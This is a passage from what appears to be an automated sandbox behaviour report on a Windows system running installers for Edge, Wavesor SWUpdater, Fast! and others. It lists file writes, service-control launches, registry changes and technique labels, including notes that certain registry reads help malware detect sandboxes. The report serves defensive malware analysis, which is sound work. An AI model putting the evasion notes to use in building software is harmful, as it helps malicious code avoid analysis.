created C:\Program Files (x86)\Microsoft\Temp\EU8E90.tmp\MicrosoftEdgeUpdateCore.exe MicrosoftEdgeWebview2Setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Trust Protection Lists\Sigma\Content setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Locales\sv.pak setup.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping6008_338418443\manifest.fingerprint msedge.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.70\msedge_200_percent.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\resources.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\VisualElements\SmallLogoBeta.png setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\Trust Protection Lists\Sigma\Fingerprinting setup.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping6008_1692081414\hyph-la.hyb msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping6008_875330787\Wallet-Checkout\wallet-drawer.bundle.js msedge.exe File created C:\Program Files (x86)\Microsoft\Temp\EU8E90.tmp\msedgeupdateres_sr-Latn-RS.dll MicrosoftEdgeWebview2Setup.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping6008_1692081414\hyph-et.hyb msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping6008_906377591\regex_patterns.json msedge.exe File created C:\Program Files (x86)\Wavesor\Temp\GUM5FCA.tmp\SWUpdaterCore.exe SWUpdaterSetup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.70\onnxruntime.dll setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.70\Installer\setup.exe setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedge_200_percent.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.70\VisualElements\LogoCanary.png setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.70\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.70\Locales\zh-CN.pak setup.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4724_986085838\hyph-et.hyb msedgewebview2.exe File created C:\Program Files (x86)\Fast!\nwjs\locales\fi.pak.info SetupEngine.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\identity_proxy\win11\identity_helper.Sparse.Stable.msix setup.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping6008_854991972\manifest.json msedge.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.70\Locales\ko.pak setup.exe File created C:\Program Files (x86)\Fast!\BigTestFile fast!.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.70\msedge.dll setup.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping6008_371304261\nav_config.json msedge.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Locales\or.pak setup.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping6008_875330787\driver-signature.txt msedge.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.70\Locales\fa.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Trust Protection Lists\Mu\Social setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{AD42BDF0-8C2B-42C9-AE0B-A8FE5978C296}\EDGEMITMP_C9ECC.tmp\SETUP.EX_ MicrosoftEdge_X64_131.0.2903.70.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.70\vccorlib140.dll setup.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping6008_1692081414\hyph-nl.hyb msedge.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Locales\km.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.70\wdag.dll setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.70\Locales\fil.pak setup.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4724_1859347364\manifest.fingerprint msedgewebview2.exe File created C:\Program Files (x86)\Fast!\nwjs\locales\vi.pak.info SetupEngine.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Trust Protection Lists\Mu\Entities setup.exe File created C:\Program Files (x86)\Fast!\nwjs\locales\en-GB.pak.info SetupEngine.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.70\msedge_wer.dll setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.70\Trust Protection Lists\Sigma\Content setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.70\concrt140.dll setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.70\Locales\hu.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.70\Trust Protection Lists\Sigma\Fingerprinting setup.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping6008_875330787\json\i18n-tokenized-card\zh-Hant\strings.json msedge.exe File created C:\Program Files (x86)\Microsoft\Temp\EU8E90.tmp\msedgeupdateres_am.dll MicrosoftEdgeWebview2Setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\Trust Protection Lists\Mu\CompatExceptions setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.70\Locales\lb.pak setup.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1728 sc.exe 5016 sc.exe 6828 sc.exe 1980 sc.exe 5464 sc.exe 2728 sc.exe 5744 sc.exe 6308 sc.exe 6676 sc.exe 6552 sc.exe 5968 sc.exe 6848 sc.exe 7112 sc.exe 6516 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 5252 3816 WerFault.exe 152 5676 5596 WerFault.exe 161 -
System Location Discovery: System Language Discovery 1 TTPs 41 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FastSRV.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Assistant_114.0.5282.21_Setup.exe_sfx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fast!.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SpotifyFullSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeWebview2Setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language assistant_installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WaveInstaller-v1.5.19.4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nsi77EE.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdaterSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Spotify.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SetupEngine.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SetupEngine.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fast!.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Spotify.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OperaSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language assistant_installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SWUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2868 MicrosoftEdgeUpdate.exe 6028 MicrosoftEdgeUpdate.exe 6612 MicrosoftEdgeUpdate.exe 4108 MicrosoftEdgeUpdate.exe 3956 SWUpdater.exe 3252 SWUpdater.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe -
Enumerates system info in registry 2 TTPs 23 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer wavebrowser.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedgewebview2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer nw.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedgewebview2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName nw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName wavebrowser.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedgewebview2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS nw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS wavebrowser.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main\EnterpriseMode setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\131.0.2903.70\\BHO" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\131.0.2903.70\\BHO" setup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge setup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration setup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations\C:\Program Files (x86)\Microsoft\Edge\Application = "1" setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" setup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" setup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\EnterpriseMode\MSEdgePath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy setup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" setup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" setup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute setup.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software setup.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry wavebrowser.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge\InstallerPinned = "0" setup.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000 setup.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs nslookup.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133777948004082504" msedgewebview2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT nslookup.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry nw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs MicrosoftEdgeUpdate.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\RegFilesHash = a6cad6730d03a8de91bfbe23f037929c395d4cb9a8d86122182eab87b62bdc0d setup.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates nslookup.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\Sequence = "1" setup.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust MicrosoftEdgeUpdate.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\SessionHash = b79d073bb45b483d50392e80e11c10df75469ac656d7b605e06627321fb37690 setup.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\ProxyStubClsid32\ = "{C7931E4D-82F7-486C-9FFB-E44AB90B021F}" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\ = "IGoogleUpdate3WebSecurity" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\microsoft-edge setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Interface\{2C53B9D4-A718-4972-B28E-2E7AF1055602}\NumMethods\ = "10" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Interface\{730EBDF4-7AD2-4516-BF1A-6C6F28C60CF9}\NumMethods SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\WOW6432Node\CLSID\{3C41B0C4-B5B6-4293-BED4-C927CCFDB909}\VersionIndependentProgID\ = "WavesorSWUpdater.PolicyStatusUser" SWUpdater.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{42580F9E-2678-4BB9-A2BC-F22A1D432A1A}\InprocHandler32 MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\ = "IProcessLauncher2" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{492E1C30-A1A2-4695-87C8-7A8CAD6F936F}\LocalServer32 MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Interface\{92333BDA-3022-4A7F-8858-081260EA85DE}\ProxyStubClsid32\ = "{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF}" SWUpdaterComRegisterShell64.exe Key deleted \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\CLSID\{F6994161-37C3-47C9-BE83-C84C33A1CF2A} SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{79E0C401-B7BC-4DE5-8104-71350F3A9B67}\ = "IGoogleUpdate" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E55B90F1-DA33-400B-B09E-3AFF7D46BD83}\ProxyStubClsid32\ = "{C7931E4D-82F7-486C-9FFB-E44AB90B021F}" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7584D24A-E056-4EB1-8E7B-632F2B0ADC69}\ = "IPolicyStatusValue" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) 